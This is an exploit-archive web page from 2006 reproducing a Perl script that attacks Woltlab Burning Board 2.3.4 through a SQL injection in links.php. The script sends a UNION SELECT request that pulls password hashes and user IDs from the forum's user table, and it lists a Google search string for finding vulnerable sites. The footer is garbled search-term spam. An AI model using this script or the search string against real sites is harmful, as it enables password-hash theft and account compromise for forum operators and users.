about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , Woltlab Burning Board <= 2.3.4 (links.php) SQL Injection Exploit




2006-05-20 Woltlab Burning Board <= 2.3.4 (links.php) SQL Injection Exploit
Rated as : High Risk

#!/usr/bin/perl

use IO::Socket;

print q{
################################################################################
##                                                                        
   ##

##  Woltlab Burning Board 2.3.4 <= "links.php" <= SQL
Injection Exploit       ##
##  - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -   
   ##
##  Exploit by       |  LoK-Crew                                          
   ##

##  Vulnerability by |  x82                                               
   ##
##  Googledork       |  inurl:/wbb2/links.php?cat                         
   ##
##  Usage            |  links.pl [server] [path]                          
   ##

##  - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -   
   ##
##                                                                        
   ##
################################################################################


};

$webpage = $ARGV[0];
$directory = $ARGV[1];

if (!$webpage||!$directory) { die "[+] Exploit failed\n"; }

$wbb_dir =
"http://".$webpage.$directory."links.php?cat=31337+union+select+password,userid+from+bb1_users";


$sock = IO::Socket::INET->new(Proto=>"tcp",
PeerAddr=>"$webpage", PeerPort=>"80") || die
"[+] Can't connect to Server\n";
print "[+] Exploiting....\n";

print $sock "GET $wbb_dir HTTP/1.1\n";
print $sock "Accept: */*\n";
print $sock "User-Agent: Hacker\n";
print $sock "Host: $webpage\n";
print $sock "Connection: close\n\n";


while ($answer = <$sock>) {
	if ($answer =~
/(................................)<\/b><\/font>/) {
		print "[+] Hash: $1\n";
		exit();
	}
	if ($answer =~ /SQL-DATABASE ERROR/) {

		break;
	}
}

$wbb_dir =
"http://".$webpage.$directory."links.php?cat=31337+union+select+password,userid+from+bb1_users";
close($sock);

$sock = IO::Socket::INET->new(Proto=>"tcp",
PeerAddr=>"$webpage", PeerPort=>"80") || die
"[+] Can't connect to Server\n";

print $sock "GET $wbb_dir HTTP/1.1\n";
print $sock "Accept: */*\n";
print $sock "User-Agent: Hacker\n";
print $sock "Host: $webpage\n";
print $sock "Connection: close\n\n";


while ($answer = <$sock>) {
	if ($answer =~
/(................................)<\/b><\/font>/) {
		print "[+] Hash: $1\n";
		exit();
	}
	if ($answer =~ /SQL-DATABASE ERROR/) {

		print "[+] Try replacing bb1_users with bb2_users\n";
		break;
	}
}
close($sock);

print "[+] Exploit failed\n";
securitydot.net - 2006-05-20

Advertising

Copyright 2007, SecurityDot
Sat, 21 Nov 2009 02:43:41 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www.3p Smallwoman FILME www.szchty /search/ex www.ilhlf. best price osp.qsnook www.khwj8. xdnk120.co www.it3366 200 /compo components Bollywood www.leepun championna trisha ba Saxy imege www.hbshou shawty vid Snehawetph www.dglsqq wenjucang. Www.Ultrap DSL-500 or cat /etc// www.sunjin shopcart jialefu.cc GET /galle www.fourse sexpohoto trac 0.10b ipb+2.16 Squid Prox Microsoft+ xxx stills WWW.COWLIS extras/ext www.pinkwo www.xiawps mambo Remo mother son @mail Ssc t.a.re t343t zeroboard. thrisha ga sql server Www,wanita